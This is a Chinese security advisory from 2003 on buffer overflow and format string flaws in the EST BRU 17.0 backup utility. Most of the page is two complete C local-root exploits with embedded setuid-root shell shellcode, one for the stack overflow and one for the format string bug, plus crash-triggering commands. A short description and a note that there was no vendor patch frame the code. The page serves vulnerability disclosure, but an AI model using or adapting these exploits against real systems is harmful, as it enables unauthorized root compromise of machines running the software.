安全研究
安全漏洞
Tolis Group BRU不正确命令选项解析漏洞
发布日期:2003-07-16
更新日期:2003-07-24
受影响系统:
Tolis Group BRU 17.0 Linux描述:
BUGTRAQ ID: 8215
EST BRU是一款Linux备份工具。
EST BRU没有正确解析命令行选项,本地攻击者可以利用这些漏洞以高权限在系统上执行任意指令。
EST BRU存在格式串和普通的缓冲区溢出问题,攻击者提交超长字符串或格式字符串作为/bin/bru参数,可导致内存敏感信息被破坏,精心构建提交数据可以高权限在系统上执行任意指令。
默认情况下/bin/bru不以suid属性安装,不过安装手册有指示如何设置suid属性。
<*来源:KF (dotslash@snosoft.com)
链接:http://www.securiteam.com/unixfocus/5XP0H20AKU.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'`
bru: [E155] error - memory fault (SIGSEGV)
elguapo@gentoo elguapo $ /bru/bru %n%n%n%n
bru: [E155] error - memory fault (SIGSEGV)
DVDMAN(DVDMAN@L33TSECURITY.COM) 提供了如下测试程序:
/** EST BRU(TM) Backup and Restore Utility Local Root Exploit
**
** By: Dvdman@l33tsecurity.com
**
** Simple Stack overflow Wont say any more :P
**
** Linux & FreeBsd Targets
**
** Greetz: sam,flatline,v0id,#!l33tsecurity@efnet,KF,b0iler,schlumpf,kokanin,DSR
**
** Public Release
** L33tsecurity 2003; irc.secsup.org #l33tsecurity
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/errno.h>
#define FUN "./bru"
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* SETUID(0) SHELLCODE LINUX */
"\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
"\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
unsigned long sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char **argv) {
char buffer[9000];
int x,target;
char *env[2];
char *args[24];
unsigned long ret = 0xbffffffa - strlen(shellcode) - strlen(FUN);
int *ptr = (int *)(buffer);
if (argc != 2) {
usage();
exit(0);
}
target = atoi(argv[1]);
if (target == 0) {
for (x=0; x<9000 ; x+=4)
*ptr++ = (ret + 1);
}
if (target == 1) {
for (x=0; x<3500 ; x+=4)
*ptr++ = 0xbfbffe48;
}
/* put in env */
env[0] = shellcode;
env[1] = NULL;
args[0] = FUN;
args[1] = buffer;
args[2] = NULL;
execve (args[0], args, env);
perror ("execve");
}
int usage() {
printf("EST BRU(TM)local root exploit\n");
printf("By: Dvdman@l33tsecurity.com\n");
printf("Usage: ./ex_bru target\n");
printf("TARGET LIST:\n");
printf("0. LINUX\n1. FREEBSD\n");
return 0;
}Ph4nt0m Security Team 提供了如下测试程序:
/*
*by jsk for bru-format-root-ex
*Ph4nt0m Security Team
*web:www.ph4nt0m.org
*publlic---ex ^^ :)
*test in redhat 8.0
*bash-2.05b$ ls -al bru
*-rws--x--x 1 root bin 165836 11鏈?29 1999 bru
*bash-2.05b$ id
*uid=37(rpm) gid=37(rpm) groups=37(rpm)
* bash-2.05b$ ./bruex
*Use shellcode 0xc4ffff65
* sh-2.05b#
*ths : sam from SST Group
*/
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <errno.h>
#define MAX_FMT_LENGTH 128
#define ADD 0x100
#define FOUR sizeof( size_t ) * 4
#define HELL "./bru"
#define OCT( b0, b1, b2, b3, addr, str ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
if ( b0 * b1 * b2 * b3 == 0 ) { \
printf( "\n%s contains a NUL byte. Leaving...\n", str ); \
exit( EXIT_FAILURE ); \
} \
}
/ shell by sam/
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* shellcode */
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
int
build_un( char * buf, unsigned int locaddr, unsigned int retaddr, unsigned int
offset, unsigned int base )
{
unsigned char b0, b1, b2, b3;
int start = ( (base / ADD) + 1 ) * ADD;
int sz;
/* : where to overwrite */
OCT( b0, b1, b2, b3, locaddr, "[ locaddr ]" );
sz = snprintf( buf, FOUR + 1, /* 16 char to have the 4 addresses */
"%c%c%c%c" /* + 1 for the ending \0 */
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 1, b2, b1, b0,
b3 + 2, b2, b1, b0,
b3 + 3, b2, b1, b0 );
/* where is our shellcode ? */
OCT( b0, b1, b2, b3, retaddr, "[ retaddr ]" );
return snprintf( buf + sz, MAX_FMT_LENGTH,
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
b3 - FOUR + start - base, offset,
b2 - b3 + start, offset + 1,
b1 - b2 + start, offset + 2,
b0 - b1 + start, offset + 3 );
}
/*
* main function
*
*/
int main()
{
int ret_addr;
char buf[256];
char *args[24];
char *env[2];
ret_addr = 0xc4fffffa - strlen(shellcode) - strlen(HELL);
/* put in env */
env[0] = shellcode;
env[1] = NULL;
printf ("Use shellcode 0x%x\n", ret_addr);
memset(buf, 0, sizeof(buf));
build_un(buf, 0x08070148, 0x97d7d741, 73 ,3);
args[0] = HELL;
args[1] = buf;
args[2] = NULL;
execve (args[0], args, env);
perror ("execve");
return 0;
}
建议:
厂商补丁:
Tolis Group
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.tolisgroup.com/main.html
浏览次数:2948
严重程度:0(网友投票)
绿盟科技给您安全的保障